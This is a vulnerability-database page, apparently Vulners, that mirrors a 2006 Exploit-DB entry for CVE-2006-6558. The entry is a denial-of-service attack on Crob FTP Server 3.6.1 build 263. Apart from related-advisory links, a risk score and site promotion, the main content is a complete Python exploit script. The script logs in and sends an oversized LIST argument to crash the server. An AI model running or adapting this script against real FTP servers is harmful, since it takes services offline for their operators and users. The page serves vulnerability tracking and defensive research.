Lucene search
+L

Crob FTP Server 3.6.1 build 263 - 'LIST/NLST' Denial of Service

🗓️ 13 Dec 2006 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Crob FTP Server 3.6.1 build 263 'LIST/NLST' Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
CROB FTP Server Multiple Command Remote Overflow DoS
3 Jun 200500:00
nessus
Tenable Nessus
Crob FTP Server < 3.6.1 build 263 Multiple Vulnerabilities
20 Jul 200500:00
nessus
Check Point Advisories
Preemptive Protection against Crob FTP Server Denial of Service Vulnerability
26 Dec 200600:00
checkpoint_advisories
CVE
CVE-2006-6558
14 Dec 200618:00
cve
Cvelist
CVE-2006-6558
14 Dec 200618:00
cvelist
EUVD
EUVD-2006-6541
7 Oct 202500:30
euvd
NVD
CVE-2006-6558
14 Dec 200618:28
nvd
import sys,os,string
import socket
import struct
import time

print "-----------------------------------------------------------------------"
print "# Crob FTP Server 3.6.1 b.263 LIST, NLST and NLST -al Denial of Service"
print "# url: http://www.crob.net/en/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot[org]"
print "# site: http://shinnai.altervista.org"
print "# and, always, special thanks to rgod"
print "-----------------------------------------------------------------------"


buffer = "?A" * 9000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
       conn = s.connect(("127.0.0.1",21))
except:
       print "- Unable to connect. exiting."

d = s.recv(1024)
time.sleep(1)
s.send('USER %s\r\n' % "test")
time.sleep(1)
s.send('PASS %s\r\n' % "test")
time.sleep(1)
s.send('LIST %s\r\n' % buffer)
time.sleep(1)
s.send('HELP %s\r\n')

# milw0rm.com [2006-12-13]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Dec 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.06393
35